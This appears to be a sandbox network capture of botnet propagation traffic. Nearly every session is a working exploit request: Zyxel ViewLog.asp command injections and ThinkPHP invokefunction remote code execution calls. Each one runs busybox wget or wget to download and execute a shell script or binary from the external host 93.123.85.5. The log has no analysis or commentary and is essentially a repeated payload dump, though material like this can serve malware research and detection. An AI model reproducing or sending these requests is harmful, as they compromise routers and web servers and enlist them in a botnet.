                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              259192.168.2.235348285.187.227.238080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:47.418617964 CET5878OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              26192.168.2.235730695.86.68.2318080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:11.260066986 CET1532OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              260192.168.2.235727031.200.29.28080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:47.420327902 CET5879OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              261192.168.2.2346804112.125.182.25580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:48.934541941 CET6103OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:49.246005058 CET6123INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:15:23 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              262192.168.2.2337516112.95.139.9080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:48.969544888 CET6105OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              263192.168.2.235425831.136.253.1948080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:49.099342108 CET6118OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:50.126960039 CET6245OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:52.142678976 CET6489OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:56.334201097 CET6970OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:04.525227070 CET7953OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:20.651062012 CET9928OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:52.902846098 CET14018OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              264192.168.2.233521031.136.73.2188080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:49.099908113 CET6119OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:50.126960039 CET6244OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:52.142678976 CET6489OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:56.334172010 CET6969OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:04.525227070 CET7954OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:20.651062012 CET9928OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:52.902846098 CET14018OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              265192.168.2.235616462.29.101.2028080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:49.114185095 CET6120OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              266192.168.2.234544894.123.187.1508080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:49.115658045 CET6121OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              267192.168.2.2350770112.214.239.24280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:49.228369951 CET6122OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:49.523267984 CET6131INHTTP/1.1 500 Internal Error
                                                              content-length: 268
                                                              content-type:text/html
                                                              connection:close
                                                              cache-control:no-cache, no-store
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 35 30 30 20 69 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 3c 2f 68 31 3e 41 6e 20 75 6e 65 78 70 65 63 74 65 64 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 3b 20 70 6c 65 61 73 65 20 77 61 69 74 20 61 20 77 68 69 6c 65 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 20 49 66 20 74 68 65 20 70 72 6f 62 6c 65 6d 20 70 65 72 73 69 73 74 73 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 75 70 70 6f 72 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 76 65 2e 3c 68 31 3e 20 41 64 64 69 74 69 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 3c 2f 68 31 3e 54 68 65 20 48 54 54 50 20 68 65 61 64 65 72 73 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 70 61 72 73 65 64 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><body><h1>HTTP 500 internal server error</h1>An unexpected error occurred; please wait a while and try again. If the problem persists, please contact your support representative.<h1> Additional information </h1>The HTTP headers could not be parsed.</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              268192.168.2.2337552112.126.178.13080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:49.247315884 CET6124OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:49.560290098 CET6132INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:48 GMT
                                                              Server: Apache
                                                              Content-Length: 11
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              269192.168.2.2359202112.125.188.12180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:49.248264074 CET6125OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:49.563080072 CET6133INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:56 GMT
                                                              Server: Apache
                                                              Content-Length: 11
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              27192.168.2.235893094.237.83.2248080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:11.540977955 CET1534OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:11.843997002 CET1588INHTTP/1.1 302 Moved Temporarily
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:18:11 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 138
                                                              Connection: close
                                                              Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              270192.168.2.2334072112.78.9.9980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:49.333986998 CET6126OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:49.698734045 CET6157INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:45 GMT
                                                              Server:
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


